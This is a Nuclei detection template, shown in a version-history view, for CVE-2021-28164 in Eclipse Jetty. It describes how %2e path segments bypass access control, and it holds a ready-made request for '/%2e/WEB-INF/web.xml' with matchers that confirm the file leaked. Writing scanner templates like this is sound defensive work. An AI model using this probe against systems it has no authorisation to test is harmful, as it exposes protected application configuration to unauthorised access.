nuclei-templates/http/cves/2021/CVE-2021-28164.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

2021-06-09 09:07:40 +00:00
id: CVE-2021-28164
2021-06-09 06:07:03 +00:00
info:
name: Eclipse Jetty - Information Disclosure
2021-06-09 06:07:03 +00:00
author: noamrathaus
2021-06-24 18:35:59 +00:00
severity: medium
2021-06-09 06:07:03 +00:00
description: |
Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application.
reference:
2021-06-09 09:08:12 +00:00
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
2021-06-24 18:24:29 +00:00
- https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
- https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E
- https://nvd.nist.gov/vuln/detail/cve-2021-28164
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-28164
cwe-id: CWE-200
tags: vulhub,cve,cve2021,jetty
2021-06-09 06:07:03 +00:00
http:
2021-06-09 06:07:03 +00:00
- method: GET
path:
2021-06-24 18:24:29 +00:00
- "{{BaseURL}}/%2e/WEB-INF/web.xml"
2021-06-09 06:07:03 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-06-24 18:24:29 +00:00
2021-06-09 06:07:03 +00:00
- type: word
words:
- "</web-app>"
2021-06-24 18:35:59 +00:00
- "java.sun.com"
2021-06-09 06:07:03 +00:00
part: body
2021-06-24 18:35:59 +00:00
condition: and
2021-06-09 09:07:40 +00:00
2021-06-09 06:07:03 +00:00
- type: word
part: header
words:
- "application/xml"
# Enhanced by cs on 2023/04/10